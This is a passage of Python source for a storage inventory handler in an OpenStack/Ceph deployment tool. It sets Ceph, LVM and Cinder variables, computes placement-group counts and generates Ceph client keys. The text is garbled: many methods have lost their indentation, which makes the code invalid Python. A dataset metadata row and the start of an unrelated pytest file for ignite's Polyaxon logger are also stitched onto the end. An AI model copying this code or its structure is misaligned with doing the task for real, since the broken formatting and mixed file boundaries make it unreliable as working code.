        return self._is_profile_in_hosts_profiles(profiles.Profiles.get_caasmaster_service_profile(), host)

    def _is_host_storage(self, host):
        """True if *host* carries the storage service profile."""
        return self._is_profile_in_hosts_profiles(profiles.Profiles.get_storage_service_profile(), host)
def _is_controller_has_compute(self):
if set.intersection(set(self.compute_hosts), set(self.controller_hosts)):
return True
return False
def _is_collocated_controller_node_config(self):
if set.intersection(set(self.storage_hosts), set(self.controller_hosts)):
return True
return False
def _is_collocated_3controllers_config(self):
if (self._is_collocated_controller_node_config() and
(len(self.controller_hosts) == 3) and (len(self.hosts) == 3)):
return True
return False
def _is_dedicated_storage_config(self):
collocated_config = set.intersection(set(self.storage_hosts), set(self.controller_hosts))
if collocated_config and (collocated_config == set(self.controller_hosts)):
return False
elif self.storage_hosts:
return True
else:
return False
    def handle_bootstrapping(self):
        """Entry point for the bootstrapping phase."""
        self.handle('bootstrapping')

    def handle_provisioning(self):
        """Entry point for the provisioning phase."""
        self.handle('provisioning')

    def handle_postconfig(self):
        """Entry point for the post-configuration phase."""
        self.handle('postconfig')

    def handle_setup(self):
        """Setup phase: nothing to do for storage."""
        pass
    def _template_and_add_vars_to_hosts(self, template, **variables):
        """Render *template* (Jinja producing a JSON object keyed by host
        name) with *variables* and add the resulting per-host vars.

        Raises:
            cmerror.CMError: wrapping any rendering/parsing failure.
        """
        try:
            text = Environment().from_string(template).render(variables)
            if text:
                self._add_vars_for_hosts(text)
        except Exception as exp:
            raise cmerror.CMError(str(exp))

    def _add_vars_for_hosts(self, inventory_text):
        """Parse *inventory_text* as {host: {var: value}} and register every
        variable on its host."""
        inventory = json.loads(inventory_text)
        for host in inventory.keys():
            for var, value in inventory[host].iteritems():
                self.add_host_var(host, var, value)
@staticmethod
def _read_cinder_ceph_client_uuid():
if os.path.isfile(USER_SECRETS):
d = dict(line.split(':', 1) for line in open(USER_SECRETS))
cinder_ceph_client_uuid = d['cinder_ceph_client_uuid'].strip()
return cinder_ceph_client_uuid
else:
raise cmerror.CMError("The file {} does not exist.".format(USER_SECRETS))
    def _add_cinder_backends(self):
        """Add cinder backend vars to all controller hosts."""
        self._template_and_add_vars_to_hosts(
            JSON_CINDER_BACKENDS_HOST_VAR,
            hosts=self.controller_hosts,
            installation_controller_ip=self._installation_host_ip,
            cinder_ceph_client_uuid=self._read_cinder_ceph_client_uuid(),
            openstack_storage=self._openstack_config_handler.get_storage_backend(),
            cinder_pool_name=self._cinder_pool_name)

    def _add_external_ceph_cinder_backends(self):
        """Add external-ceph cinder backend vars to every host."""
        handler = self._storage_config_handler
        self._template_and_add_vars_to_hosts(
            JSON_EXTERNAL_CEPH_CINDER_BACKEND_HOST_VAR,
            hosts=self.hosts,
            cinder_ceph_client_uuid=self._read_cinder_ceph_client_uuid(),
            ext_ceph_user=handler.get_ext_ceph_ceph_user(),
            ext_ceph_user_key=handler.get_ext_ceph_ceph_user_key(),
            ext_ceph_fsid=handler.get_ext_ceph_fsid(),
            ext_ceph_mon_hosts=", ".join(handler.get_ext_ceph_mon_hosts()),
            nova_pool_name=self._nova_pool_name,
            glance_pool_name=self._glance_pool_name,
            cinder_pool_name=self._cinder_pool_name,
            platform_pool_name=self._platform_pool_name)

    def _add_storage_nodes_configs(self):
        """Add storage-node vars to hosts that have the rbd/ceph backend."""
        rbdhosts = []
        for host in self.hosts:
            if host.is_rbd_ceph:
                rbdhosts.append(host)
        self._template_and_add_vars_to_hosts(JSON_STORAGE_HOST_VAR, hosts=rbdhosts)

    def _add_hdd_storage_configs(self):
        """Add per-host disk configuration (os disk, instance/cinder disks)."""
        self._template_and_add_vars_to_hosts(
            JSON_STORAGE_HOST_DISK_CONFIGURATION,
            hosts=self.hosts,
            rootdisk_device=DEFAULT_ROOTDISK_DEVICE)

    def _add_lvm_storage_configs(self):
        """Add lvm backend vars to every host."""
        self._template_and_add_vars_to_hosts(JSON_LVM_STORAGE_HOST_VAR, hosts=self.hosts)

    def _add_bare_lvm_storage_configs(self):
        """Add bare_lvm backend vars to every host."""
        self._template_and_add_vars_to_hosts(JSON_BARE_LVM_STORAGE_HOST_VAR, hosts=self.hosts)

    def _add_instance_devices(self):
        """Add instance-device vars to compute hosts."""
        self._template_and_add_vars_to_hosts(JSON_DEVICE_HOST_VAR, hosts=self.compute_hosts)

    def _add_ceph_hosts(self):
        """Register mon/osd/mgr host groups and matching global parameters."""
        self._add_host_group(
            Environment().from_string(JSON_CEPH_HOSTS).render(
                mons=self._mon_hosts,
                osds=self._osd_hosts,
                mgrs=self._mgr_hosts))
        # The same rendered document is also added as global parameters.
        self._add_global_parameters(
            Environment().from_string(JSON_CEPH_HOSTS).render(
                mons=self._mon_hosts,
                osds=self._osd_hosts,
                mgrs=self._mgr_hosts))

    def _add_glance(self):
        """Add glance vars matching the active backend (ceph or lvm)."""
        if self.is_ceph_backend:
            self._template_and_add_vars_to_hosts(
                JSON_GLANCE_CEPH_ALL_GROUP_VARS,
                hosts=self.hosts,
                glance_pool_name=self._glance_pool_name)
        elif self.is_lvm_backend:
            self._template_and_add_vars_to_hosts(JSON_GLANCE_LVM_ALL_GROUP_VARS, hosts=self.hosts)
    def _add_ceph_ansible_all_sample_host_vars(self):
        """Add ceph-ansible all.yml.sample equivalents to every host."""
        self._template_and_add_vars_to_hosts(JSON_CEPH_ANSIBLE_ALL_HOST_VARS, hosts=self.hosts)

    def _add_ceph_ansible_mons_sample_host_vars(self):
        """Add ceph-ansible mons.yml.sample equivalents (pools, keys, pg nums)."""
        self._template_and_add_vars_to_hosts(
            JSON_CEPH_ANSIBLE_MONS_HOST_VARS,
            hosts=self.hosts,
            **self._get_ceph_vars())

    @property
    def _ceph_keys(self):
        """Lazily generated ceph client keyring secrets (one per client).

        Keys are produced once via ``ceph-authtool --gen-print-key`` and
        cached for subsequent accesses.

        Raises:
            cmerror.CMError: wrapping any subprocess failure.
        """
        if not self._ceph_keys_dict:
            try:
                self._ceph_keys_dict = {
                    'client.shared': subprocess.check_output(["ceph-authtool", "--gen-print-key"]).strip(),
                    'client.glance': subprocess.check_output(["ceph-authtool", "--gen-print-key"]).strip(),
                    'client.cinder': subprocess.check_output(["ceph-authtool", "--gen-print-key"]).strip(),
                    'client.caas': subprocess.check_output(["ceph-authtool", "--gen-print-key"]).strip()
                }
            except Exception as exp:
                raise cmerror.CMError(str(exp))
        return self._ceph_keys_dict

    def _get_ceph_vars(self):
        """Return the template context shared by the ceph-related templates."""
        return {
            'osd_pool_images_pg_num': self._calculated_images_pg_num,
            'osd_pool_volumes_pg_num': self._calculated_volumes_pg_num,
            'osd_pool_vms_pg_num': self._calculated_vms_pg_num,
            'osd_pool_shared_pg_num': self._calculated_shared_pg_num,
            'osd_pool_caas_pg_num': self._calculated_caas_pg_num,
            'is_openstack_deployment': self._is_openstack_deployment,
            'is_caas_deployment': self._is_caas_deployment,
            'is_hybrid_deployment': self._is_hybrid_deployment,
            'nova_pool': self._nova_pool_name,
            'glance_pool': self._glance_pool_name,
            'cinder_pool': self._cinder_pool_name,
            'platform_pool': self._platform_pool_name,
            'ceph_keys': self._ceph_keys
        }
    def _add_ceph_ansible_osds_sample_host_vars(self):
        """Add ceph-ansible osds.yml.sample equivalents to every host."""
        self._template_and_add_vars_to_hosts(JSON_CEPH_ANSIBLE_OSDS_HOST_VARS, hosts=self.hosts)

    def _add_nova(self):
        """Add nova rbd vars to compute hosts.

        External ceph deployments reuse the configured external ceph user as
        the nova client; otherwise nova uses the 'cinder' client.
        """
        if self.is_external_ceph_backend:
            nova_ceph_client = self._storage_config_handler.get_ext_ceph_ceph_user()
        else:
            nova_ceph_client = 'cinder'
        self._template_and_add_vars_to_hosts(
            JSON_NOVA_RBD_HOST_VAR, hosts=self.compute_hosts,
            nova_pool_name=self._nova_pool_name,
            nova_ceph_client=nova_ceph_client)

    def _add_single_controller_host_var(self):
        """Flag controller hosts of a single-controller deployment."""
        self._template_and_add_vars_to_hosts(
            JSON_SINGLE_CONTROLLER_VAR, hosts=self.controller_hosts)

    def _add_global_parameters(self, text):
        """Parse *text* as a JSON object and register each entry globally.

        Raises:
            cmerror.CMError: wrapping any parse/registration failure.
        """
        try:
            inventory = json.loads(text)
            for var, value in inventory.iteritems():
                self.add_global_var(var, value)
        except Exception as exp:
            raise cmerror.CMError(str(exp))

    def _add_host_group(self, text):
        """Parse *text* as a JSON object and register each entry as a host group.

        Raises:
            cmerror.CMError: wrapping any parse/registration failure.
        """
        try:
            inventory = json.loads(text)
            for var, value in inventory.iteritems():
                self.add_host_group(var, value)
        except Exception as exp:
            raise cmerror.CMError(str(exp))
@property
def cluster_network_cidrs(self):
cidrs = []
network = self._networking_config_handler.get_infra_storage_cluster_network_name()
for domain in self._networking_config_handler.get_network_domains(network):
cidrs.append(self._networking_config_handler.get_network_cidr(network, domain))
return ','.join(cidrs)
@property
def public_network_cidrs(self):
cidrs = set()
cluster_network = self._networking_config_handler.get_infra_storage_cluster_network_name()
public_network = self._networking_config_handler.get_infra_internal_network_name()
for domain in self._networking_config_handler.get_network_domains(cluster_network):
cidrs.add(self._networking_config_handler.get_network_cidr(public_network, domain))
for host in self._mon_hosts:
domain = self._hosts_config_handler.get_host_network_domain(host.name)
cidrs.add(self._networking_config_handler.get_network_cidr(public_network, domain))
return ','.join(cidrs)
    def _add_networks(self):
        """Register the public/cluster network CIDRs as global parameters."""
        self._add_global_parameters(
            Environment().from_string(JSON_NETWORK).render(
                public_networks=self.public_network_cidrs,
                cluster_networks=self.cluster_network_cidrs))

    def _add_monitor_address(self):
        """Set each mon host's 'monitor_address' var to its infra-internal IP."""
        infra_storage_network = self._networking_config_handler.get_infra_internal_network_name()
        for host in self._mon_hosts:
            monitor_address = \
                self._networking_config_handler.get_host_ip(host.name, infra_storage_network)
            self.add_host_var(host.name, "monitor_address", monitor_address)
def _add_override_settings(self):
ceph_osd_pool_size = self._storage_config_handler.get_ceph_osd_pool_size()
if self._is_collocated_3controllers_config():
self._add_global_parameters(
Environment().from_string(JSON_OVERRIDE_3CONTROLLERS).render(
osd_pool_default_size=ceph_osd_pool_size,
osd_pool_default_min_size=str(ceph_osd_pool_size-1),
osd_pool_default_pg_num=self._calculated_default_pg_num))
self._add_global_parameters(
Environment().from_string(JSON_OS_TUNING).render())
elif self._is_controller_has_compute():
self._add_global_parameters(
Environment().from_string(JSON_OVERRIDE_CACHE).render(
osd_pool_default_size=ceph_osd_pool_size,
osd_pool_default_min_size=str(ceph_osd_pool_size-1),
osd_pool_default_pg_num=self._calculated_default_pg_num))
self._add_global_parameters(
Environment().from_string(JSON_OS_TUNING).render())
else:
self._add_global_parameters(
Environment().from_string(JSON_OVERRIDE).render(
osd_pool_default_size=ceph_osd_pool_size,
osd_pool_default_min_size=str(ceph_osd_pool_size-1),
osd_pool_default_pg_num=self._calculated_default_pg_num))
    def _calculate_pg_num(self, pool_data_percentage):
        """Compute a placement-group count for a pool holding
        *pool_data_percentage* of the data, given the OSD count and replica
        count of this deployment."""
        pgnum = PGNum(self._total_number_of_osds,
                      pool_data_percentage,
                      self._number_of_replicas)
        return pgnum.calculate()

    @property
    def _calculated_default_pg_num(self):
        """pg_num for a pool receiving an even share of the data."""
        return self._calculate_pg_num(self._pool_data_percentage)

    @property
    def _calculated_volumes_pg_num(self):
        """pg_num for the cinder volumes pool (openstack share scaled)."""
        return self._calculate_pg_num(
            OSD_POOL_VOLUMES_PG_NUM_PERCENTAGE * self._ceph_openstack_pg_proportion)

    @property
    def _calculated_images_pg_num(self):
        """pg_num for the glance images pool (openstack share scaled)."""
        return self._calculate_pg_num(
            OSD_POOL_IMAGES_PG_NUM_PERCENTAGE * self._ceph_openstack_pg_proportion)

    @property
    def _calculated_vms_pg_num(self):
        """pg_num for the nova vms pool (openstack share scaled)."""
        return self._calculate_pg_num(
            OSD_POOL_VMS_PG_NUM_PERCENTAGE * self._ceph_openstack_pg_proportion)

    @property
    def _calculated_shared_pg_num(self):
        """pg_num for the shared platform pool (fixed percentage)."""
        return self._calculate_pg_num(
            OSD_POOL_SHARED_PG_NUM_PERCENTAGE)

    @property
    def _calculated_caas_pg_num(self):
        """pg_num for the caas pool, or 0 when caas gets no ceph share.

        The shared pool's percentage is carved out of the caas allocation
        before scaling by the caas proportion.
        """
        if self._ceph_caas_pg_proportion > 0:
            return self._calculate_pg_num(
                (OSD_POOL_CAAS_PG_NUM_PERCENTAGE - OSD_POOL_SHARED_PG_NUM_PERCENTAGE) *
                self._ceph_caas_pg_proportion)
        return 0

    def _add_osd_pool_pg_nums(self):
        """Register the per-pool pg_num values as global parameters."""
        self._add_global_parameters(
            Environment().from_string(JSON_OSD_POOL_PGNUMS).render(**self._get_ceph_vars()))
    @property
    def _installation_host(self):
        """Name of the host the installation is driven from."""
        return self._hosts_config_handler.get_installation_host()

    @property
    def _infra_internal_network_name(self):
        """Name of the infra internal network."""
        return self._networking_config_handler.get_infra_internal_network_name()

    @property
    def _installation_host_ip(self):
        """Infra-internal IP address of the installation host."""
        return self._networking_config_handler.get_host_ip(
            self._installation_host, self._infra_internal_network_name)

    @property
    def is_ceph_backend(self):
        """True when ceph storage is enabled in the configuration."""
        return self._storage_config_handler.is_ceph_enabled()

    @property
    def is_external_ceph_backend(self):
        """True when an external ceph cluster backs openstack storage."""
        return (self._storage_config_handler.is_external_ceph_enabled() and
                self._ceph_is_openstack_storage_backend)

    def _set_external_ceph_pool_names(self):
        """Override the default pool names with the external ceph pool names."""
        if self.is_external_ceph_backend:
            h = self._storage_config_handler
            self._nova_pool_name = h.get_ext_ceph_nova_pool()
            self._cinder_pool_name = h.get_ext_ceph_cinder_pool()
            self._glance_pool_name = h.get_ext_ceph_glance_pool()
            self._platform_pool_name = h.get_ext_ceph_platform_pool()
@property
def _lvm_is_openstack_storage_backend(self):
return True if self._openstack_config_handler.get_storage_backend() == 'lvm' else False
@property
def _ceph_is_openstack_storage_backend(self):
return True if self._openstack_config_handler.get_storage_backend() == 'ceph' else False
@property
def is_lvm_backend(self):
return (self._storage_config_handler.is_lvm_enabled() and
self._lvm_is_openstack_storage_backend)
    @property
    def instance_default_backend(self):
        """Configured default backend for nova instances (e.g. 'rbd')."""
        return self._openstack_config_handler.get_instance_default_backend()

    @property
    def _hosts_with_ceph_storage_profile(self):
        """Hosts whose storage profile includes the ceph (rbd) backend."""
        # return filter(lambda host: host.is_rbd, self.hosts)
        return [host for host in self.hosts if host.is_rbd_ceph]

    @property
    def _is_openstack_deployment(self):
        """True for a pure openstack deployment."""
        return self._caas_config_handler.is_openstack_deployment()

    @property
    def _is_caas_deployment(self):
        """True for a pure caas deployment."""
        return self._caas_config_handler.is_caas_deployment()

    @property
    def _is_hybrid_deployment(self):
        """True for a combined openstack + caas deployment."""
        return self._caas_config_handler.is_hybrid_deployment()
    def handle(self, phase):
        """Main dispatch: populate storage inventory vars for *phase*.

        Bootstrapping only needs the disk configuration; all other phases
        additionally render backend-, ceph- and topology-specific variables.
        """
        self._init_jinja_environment()
        self.add_global_var("external_ceph_configured", self.is_external_ceph_backend)
        self.add_global_var("ceph_configured", self.is_ceph_backend)
        self.add_global_var("lvm_configured", self.is_lvm_backend)
        if phase == 'bootstrapping':
            self._add_hdd_storage_configs()
        else:
            self._add_hdd_storage_configs()
            if self.is_external_ceph_backend:
                self._set_external_ceph_pool_names()
                self._add_external_ceph_cinder_backends()
            else:
                if self._is_openstack_deployment:
                    self._add_cinder_backends()
                    self._add_glance()
                # Internal ceph: render the full ceph-ansible variable set
                # only when some host actually carries the ceph profile.
                ceph_hosts = self._hosts_with_ceph_storage_profile
                if ceph_hosts:
                    self._set_ceph_pg_proportions(ceph_hosts)
                    self._add_ceph_ansible_all_sample_host_vars()
                    self._add_ceph_ansible_mons_sample_host_vars()
                    self._add_ceph_ansible_osds_sample_host_vars()
                    self._add_ceph_hosts()
                    self._add_storage_nodes_configs()
                    self._add_monitor_address()
                    self._add_override_settings()
                    self._add_osd_pool_pg_nums()
                    self._add_networks()
                    self.add_global_var("cinder_ceph_client_uuid", self._read_cinder_ceph_client_uuid())
            if self.is_lvm_backend:
                self._add_lvm_storage_configs()
            self._add_bare_lvm_storage_configs()
            self.add_global_var("instance_default_backend", self.instance_default_backend)
            self.add_global_var("storage_single_node_config", self.single_node_config)
            self.add_global_var("one_controller_node_config", self._is_one_controller_node_config)
            if self._is_one_controller_node_config:
                self._add_single_controller_host_var()
            self.add_global_var("collocated_controller_node_config",
                                self._is_collocated_controller_node_config())
            self.add_global_var("dedicated_storage_node_config",
                                self._is_dedicated_storage_config())
            self.add_global_var("storage_one_controller_multi_nodes_config",
                                self._is_one_controller_multi_nodes_config)
            if self.instance_default_backend == 'rbd':
                self._add_nova()
            elif self.instance_default_backend in SUPPORTED_INSTANCE_BACKENDS:
                self._add_instance_devices()
    def _set_ceph_pg_proportions(self, ceph_hosts):
        """Fix the openstack/caas placement-group split for this deployment.

        Hybrid deployments read both proportions from the storage profile;
        pure deployments assign the whole share to one side.
        """
        # FIXME: First storage host's storage profile assumed to get pg proportion values
        hostname = ceph_hosts[0].name
        if self._is_hybrid_deployment:
            self._ceph_openstack_pg_proportion = self._get_ceph_openstack_pg_proportion(hostname)
            self._ceph_caas_pg_proportion = self._get_ceph_caas_pg_proportion(hostname)
        elif self._is_openstack_deployment:
            self._ceph_openstack_pg_proportion = 1.0
            self._ceph_caas_pg_proportion = 0.0
        elif self._is_caas_deployment:
            self._ceph_openstack_pg_proportion = 0.0
            self._ceph_caas_pg_proportion = 1.0
def _init_host_data(self):
hosts = self._hosts_config_handler.get_enabled_hosts()
self.single_node_config = True if len(hosts) == 1 else False
for name in hosts:
host = self._initialize_host_object(name)
self.hosts.append(host)
if host.is_osd:
self._osd_hosts.append(host)
if host.is_mon:
self._mon_hosts.append(host)
if host.is_mgr:
self._mgr_hosts.append(host)
for host in self.hosts:
if host.is_compute:
self.compute_hosts.append(host)
if host.is_controller:
self.controller_hosts.append(host)
if host.is_storage:
self.storage_hosts.append(host)
    @property
    def _number_of_osd_hosts(self):
        """Count of hosts carrying the OSD role."""
        return len(self._osd_hosts)

    @property
    def _is_one_controller_multi_nodes_config(self):
        """True for a single-controller deployment with additional nodes."""
        if len(self.controller_hosts) == 1 and not self.single_node_config:
            return True
        return False

    @property
    def _is_one_controller_node_config(self):
        """True when exactly one controller exists."""
        if len(self.controller_hosts) == 1:
            return True
        return False

    @property
    def _number_of_osds_per_host(self):
        """OSD disk count per host, read from the first OSD host's profile.

        NOTE(review): assumes all OSD hosts have the same disk count.
        """
        first_osd_host = self._osd_hosts[0].name
        return self._get_nr_of_ceph_osd_disks(first_osd_host)

    @property
    def _total_number_of_osds(self):
        """Total OSD count across the deployment."""
        return self._number_of_osds_per_host * self._number_of_osd_hosts

    @property
    def _number_of_pools(self):
        """TODO: Get dynamically"""
        return NUMBER_OF_POOLS

    @property
    def _pool_data_percentage(self):
        """Even data share per pool (1 / number of pools)."""
        return float(1.0 / self._number_of_pools)

    @property
    def _number_of_replicas(self):
        """Configured osd pool size, defaulting to 2 when unset (0)."""
        num = self._storage_config_handler.get_ceph_osd_pool_size()
        return 2 if num == 0 else num
    def _init_jinja_environment(self):
        """Prepare host data used by the templating calls."""
        self._init_host_data()

    def _is_backend_configured(self, backend, host_name):
        """True if *host_name* has a storage profile using *backend*.

        Configuration errors are treated as 'not configured'.
        """
        try:
            if self._get_storage_profile_for_backend(host_name, backend):
                return True
            return False
        except configerror.ConfigError:
            return False

    def _get_storage_profile_for_backend(self, host_name, *backends):
        """Return the first storage profile of *host_name* whose backend is
        one of *backends*, or None when no profile matches."""
        storage_profiles = self._hosts_config_handler.get_storage_profiles(host_name)
        sp_handler = self._sp_config_handler
        for storage_profile in storage_profiles:
            if sp_handler.get_profile_backend(storage_profile) in backends:
                return storage_profile
        return None

    def _get_nr_of_ceph_osd_disks(self, host_name):
        """OSD disk count from the host's ceph storage profile."""
        return self._get_storage_profile_attribute(host_name, 'nr_of_ceph_osd_disks')

    def _get_storage_profile_attribute(self, host_name, attribute):
        """Read *attribute* from the host's matching storage profile.

        The attribute's applicable backends and getter come from
        self._storage_profile_attribute_properties.

        Raises:
            cmerror.CMError: when no profile with a matching backend exists.
        """
        attribute_properties = self._storage_profile_attribute_properties[attribute]
        storage_profile = self._get_storage_profile_for_backend(host_name,
                                                                *attribute_properties['backends'])
        if storage_profile:
            return attribute_properties['getter'](storage_profile)
        raise cmerror.CMError(str("Failed to get %s" % attribute))

    def _get_ceph_openstack_pg_proportion(self, host_name):
        """Openstack share of placement groups from the ceph profile."""
        return self._get_storage_profile_attribute(host_name, 'openstack_pg_proportion')

    def _get_ceph_caas_pg_proportion(self, host_name):
        """Caas share of placement groups from the ceph profile."""
        return self._get_storage_profile_attribute(host_name, 'caas_pg_proportion')
    def _get_lvm_instance_storage_partitions(self, host_name):
        """Partition list for instance storage, or [] when not applicable.

        Raises:
            cmerror.CMError: when the configured default backend is unknown.
        """
        try:
            if self.instance_default_backend in SUPPORTED_INSTANCE_BACKENDS:
                return self._get_storage_profile_attribute(
                    host_name, 'lvm_instance_storage_partitions')
        except configerror.ConfigError:
            # Missing profile attribute: fall through to the default below.
            pass
        if self.instance_default_backend not in ALL_DEFAULT_INSTANCE_BACKENDS:
            raise cmerror.CMError(
                str("Unknown instance_default_backend %s "
                    "not supported" % self.instance_default_backend))
        return []

    def _get_lvm_cinder_storage_partitions(self, host_name):
        """Cinder partition list from the host's lvm storage profile."""
        return self._get_storage_profile_attribute(host_name, 'lvm_cinder_storage_partitions')

    def _get_bare_lvm_mount_options(self, host_name):
        """Mount options from the host's bare_lvm storage profile."""
        return self._get_storage_profile_attribute(host_name, 'mount_options')

    def _get_bare_lvm_mount_dir(self, host_name):
        """Mount directory from the host's bare_lvm storage profile."""
        return self._get_storage_profile_attribute(host_name, 'mount_dir')

    def _get_bare_lvm_lv_name(self, host_name):
        """Logical volume name from the host's bare_lvm storage profile."""
        return self._get_storage_profile_attribute(host_name, 'lv_name')

    def _get_instance_lv_percentage(self, host_name):
        """Instance copy-on-write LV percentage, or the default when the
        profile does not define one.

        Raises:
            cmerror.CMError: when the default backend is not a supported
                instance backend at all.
        """
        try:
            if self.instance_default_backend in SUPPORTED_INSTANCE_BACKENDS:
                return self._get_storage_profile_attribute(
                    host_name, 'lvm_instance_cow_lv_storage_percentage')
        except configerror.ConfigError:
            return DEFAULT_INSTANCE_LV_PERCENTAGE
        raise cmerror.CMError(str("Failed to found lvm from storage_profiles"))
    def _is_osd_host(self, name):
        """True if *name* is listed among the storage-profile hosts."""
        try:
            return bool(name in self._hosts_config_handler.get_service_profile_hosts('storage'))
        except configerror.ConfigError:
            return False

    def _is_rbd_ceph_configured(self, host_name):
        """True if the host has a ceph-backed storage profile."""
        return self._is_backend_configured('ceph', host_name)

    def _is_lvm_configured(self, host_name):
        """True if the host has an lvm-backed storage profile."""
        return self._is_backend_configured('lvm', host_name)

    def _is_bare_lvm_configured(self, host_name):
        """True if the host has a bare_lvm-backed storage profile."""
        return self._is_backend_configured('bare_lvm', host_name)

    def _get_hw_type(self, name):
        """Detect the hardware type of *name* via its BMC credentials."""
        hwmgmt_addr = self._hosts_config_handler.get_hwmgmt_ip(name)
        hwmgmt_user = self._hosts_config_handler.get_hwmgmt_user(name)
        hwmgmt_pass = self._hosts_config_handler.get_hwmgmt_password(name)
        hwmgmt_priv_level = self._hosts_config_handler.get_hwmgmt_priv_level(name)
        return hw.get_hw_type(hwmgmt_addr, hwmgmt_user, hwmgmt_pass, hwmgmt_priv_level)

    @staticmethod
    def _get_os_disk(hw_type):
        """Operating-system disk device for the given hardware type."""
        return hw.get_os_hd(hw_type)

    def _get_osd_disks_for_embedded_deployment(self, host_name):
        """OSD disk list taken from host config (VNF-embedded deployments)."""
        return self._hosts_config_handler.get_ceph_osd_disks(host_name)

    @staticmethod
    def _get_osd_disks(hw_type):
        """OSD-usable disk list for the given hardware type."""
        return hw.get_hd_with_usage(hw_type, "osd")

    def _by_path_disks(self, hw_type, nr_of_disks):
        """First *nr_of_disks* OSD-usable disks for the hardware type."""
        return self._get_osd_disks(hw_type)[0:nr_of_disks]

    @staticmethod
    def _is_by_path_disks(disk_list):
        """Truthy (non-empty list) when any disk path uses /dev/disk/by-path."""
        return [disk for disk in disk_list if "by-path" in disk]

    def _get_physical_volumes(self, disk_list):
        """First-partition device names for each disk in *disk_list*.

        by-path device names take a '-partN' suffix; plain device names
        take a bare numeric suffix.
        """
        partition_nr = "1"
        if self._is_by_path_disks(disk_list):
            return [disk+"-part"+partition_nr for disk in disk_list]
        else:
            return [disk+partition_nr for disk in disk_list]
    def _initialize_host_object(self, name):
        """Build a fully-populated Host object for host *name*.

        Classifies the host's roles, detects its hardware/disks, and fills
        backend-specific disk and volume attributes.
        """
        host = Host()
        host.name = name
        host.is_mgr = self._is_host_managment(host.name)
        host.is_controller = self._is_host_controller(host.name)
        host.is_compute = self._is_host_compute(host.name)
        host.is_storage = self._is_host_storage(host.name)
        host.is_rbd_ceph = self._is_rbd_ceph_configured(host.name)
        host.is_lvm = self._is_lvm_configured(host.name)
        host.is_bare_lvm = self._is_bare_lvm_configured(host.name)
        host.is_osd = self._is_osd_host(host.name)
        # Monitors run wherever managers run.
        host.is_mon = host.is_mgr
        hw_type = self._get_hw_type(name)
        host.os_disk = self._get_os_disk(hw_type)
        if host.is_bare_lvm:
            partitions = self._get_lvm_instance_storage_partitions(host.name)
            host.bare_lvm_disks = self._by_path_disks(hw_type, len(partitions))
            host.bare_lvm_physical_volumes = self._get_physical_volumes(host.bare_lvm_disks)
            host.mount_options = self._get_bare_lvm_mount_options(host.name)
            host.mount_dir = self._get_bare_lvm_mount_dir(host.name)
            host.bare_lvm_lv_name = self._get_bare_lvm_lv_name(host.name)
        if host.is_compute and self.instance_default_backend != 'rbd':
            host.vg_percentage = INSTANCE_NODE_VG_PERCENTAGE
        if self.is_lvm_backend and host.is_controller:
            nr_of_cinder_disks = int(len(self._get_lvm_cinder_storage_partitions(host.name)))
            nr_of_nova_disks = int(len(self._get_lvm_instance_storage_partitions(host.name)))
            nr_of_all_disks = nr_of_cinder_disks + nr_of_nova_disks
            # Nova disks come first in the by-path ordering; cinder gets the
            # tail of the list when both are present.
            if nr_of_nova_disks > 0:
                host.cinder_disks = \
                    self._by_path_disks(hw_type, nr_of_all_disks)[-nr_of_cinder_disks:]
            else:
                host.cinder_disks = self._by_path_disks(hw_type, nr_of_cinder_disks)
            host.cinder_physical_volumes = self._get_physical_volumes(host.cinder_disks)
        if host.is_rbd_ceph:
            nr_of_osd_disks = self._get_nr_of_ceph_osd_disks(host.name)
            if self._caas_config_handler.is_vnf_embedded_deployment():
                host.ceph_osd_disks = \
                    self._get_osd_disks_for_embedded_deployment(host.name)[0:nr_of_osd_disks]
            else:
                host.ceph_osd_disks = self._get_osd_disks(hw_type)[0:nr_of_osd_disks]
            host.osd_disks_ids = range(1, nr_of_osd_disks+1)
        if host.is_lvm and host.is_compute:
            partitions = self._get_lvm_instance_storage_partitions(host.name)
            host.instance_disks = self._by_path_disks(hw_type, len(partitions))
            host.instance_physical_volumes = self._get_physical_volumes(host.instance_disks)
            host.instance_lv_percentage = self._get_instance_lv_percentage(host.name)
        return host
| 38.954898 | 172 | 0.628109 |
f167192c1882033f95b84c2be7c34e0c680b7456 | 10,054 | py | Python | tests/ignite/contrib/handlers/test_polyaxon_logger.py | VinhLoiIT/ignite | 3b2b9655ea9f80ce49b8a9f1c2d72f80e2a95f56 | [
"BSD-3-Clause"
] | 1 | 2020-06-13T15:22:08.000Z | 2020-06-13T15:22:08.000Z | tests/ignite/contrib/handlers/test_polyaxon_logger.py | hefv57/ignite | a22a0f5e909ac70d2a1f76a60b6e84b2134f196c | [
"BSD-3-Clause"
] | null | null | null | tests/ignite/contrib/handlers/test_polyaxon_logger.py | hefv57/ignite | a22a0f5e909ac70d2a1f76a60b6e84b2134f196c | [
"BSD-3-Clause"
] | 1 | 2020-06-13T15:30:46.000Z | 2020-06-13T15:30:46.000Z | import os
import pytest
from unittest.mock import MagicMock, call
import torch
from ignite.engine import Engine, Events, State
from ignite.contrib.handlers.polyaxon_logger import *
os.environ["POLYAXON_NO_OP"] = "1"
def test_output_handler_with_wrong_logger_type():
    """OutputHandler must reject loggers that are not PolyaxonLogger."""
    wrapper = OutputHandler("tag", output_transform=lambda x: x)
    mock_logger = MagicMock()  # deliberately NOT a PolyaxonLogger
    mock_engine = MagicMock()
    with pytest.raises(RuntimeError, match="Handler 'OutputHandler' works only with PolyaxonLogger"):
        wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
def test_output_handler_output_transform():
    """output_transform results are logged under '<tag>/<key>'.

    A scalar transform logs under '<tag>/output'; a dict transform logs one
    metric per key.
    """
    wrapper = OutputHandler("tag", output_transform=lambda x: x)
    mock_logger = MagicMock(spec=PolyaxonLogger)
    mock_logger.log_metrics = MagicMock()
    mock_engine = MagicMock()
    mock_engine.state = State()
    mock_engine.state.output = 12345
    mock_engine.state.iteration = 123
    wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
    mock_logger.log_metrics.assert_called_once_with(step=123, **{"tag/output": 12345})
    # Dict-valued transform: each key is namespaced under the handler tag.
    wrapper = OutputHandler("another_tag", output_transform=lambda x: {"loss": x})
    mock_logger = MagicMock(spec=PolyaxonLogger)
    mock_logger.log_metrics = MagicMock()
    wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
    mock_logger.log_metrics.assert_called_once_with(step=123, **{"another_tag/loss": 12345})
def test_output_handler_metric_names():
    """metric_names selects engine metrics; tensors/vectors are expanded,
    non-numeric metrics are skipped with a warning, and 'all' logs every
    metric."""
    wrapper = OutputHandler("tag", metric_names=["a", "b", "c"])
